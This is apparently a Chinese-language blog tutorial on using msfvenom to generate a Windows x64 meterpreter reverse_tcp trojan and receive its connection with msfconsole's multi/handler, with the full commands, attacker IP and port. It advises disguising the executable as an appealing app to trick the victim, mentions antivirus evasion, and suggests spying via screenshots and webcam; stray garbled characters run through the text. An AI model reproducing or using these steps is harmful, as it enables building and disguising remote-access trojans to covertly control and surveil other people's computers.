下面簡(jiǎn)單的演示一下msfvenom的簡(jiǎn)單使用,
攻擊者:kali Linux? ip:192.168.187.130
靶機(jī):Windows10?
思路:利用msfvenom制作 .exe 文件摇展,然后發(fā)送到靶機(jī)Windows上面照宝,運(yùn)行后就可以在kali linux 上面利用msfconsole連接msfvenom服務(wù)控制靶機(jī)
1. 在kali Linux 上面啟動(dòng)一個(gè)終端 執(zhí)行以下命令
msfvenom -l | grep windows | grep x64 | grep tcp
列出所有可以用的并在屏幕顯示條目中有 Windows?x64 tcp 的
payload在這里我們選擇windows/x64/meterpreter/reverse_tcp
下面是使用msfvenom的部分參數(shù)河哑,是比較常用的
-p 選擇一個(gè)payload
-l 載荷列表
-f 生成的文件格式
-e 編碼方式
-i 編碼次數(shù)
-b 在生成的程序中避免出現(xiàn)的值
-x 允許我們指定一個(gè)自定義的可執(zhí)行文件作為模板斑匪,也就是將木馬捆綁到這個(gè)可執(zhí)行文件上吞杭。
-h 幫助
在這里盏浇,我們生成一個(gè)test.exe的木馬文件(文件在root文件夾下),控制端的ip為192.168.187.130芽狗,端口號(hào)為4444绢掰。然后利用這個(gè)木馬傳給靶機(jī),可以改一改名字,比如 QQ坦白說(shuō)查看器之類的滴劲,殺毒軟件可能報(bào)毒攻晒,其實(shí)是需要免殺處理的,后面學(xué)了再說(shuō)吧班挖。
2. 利用msfconsole監(jiān)聽(tīng)
啟動(dòng)msfconsole? 漫長(zhǎng)的等待..................................................
然后報(bào)錯(cuò)了鲁捏,
然后查了一下,分配的內(nèi)存不夠
解決地址https://www.tr0y.wang/2018/10/08/LUinux/
這樣解決有點(diǎn)慢萧芙,我有一個(gè)更暴力的碴萧,既然內(nèi)存不足,我就把虛擬機(jī)分配給kali Linux的內(nèi)存加到2G末购,OK問(wèn)題解決
鍵入以下命令:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost?192.168.187.130
set lport 4444
exploit
然后就可以等待了破喻,當(dāng)靶機(jī)點(diǎn)擊了那個(gè)文件時(shí)
就可以開(kāi)始你的表演了,比如截圖盟榴,打開(kāi)攝像頭等等
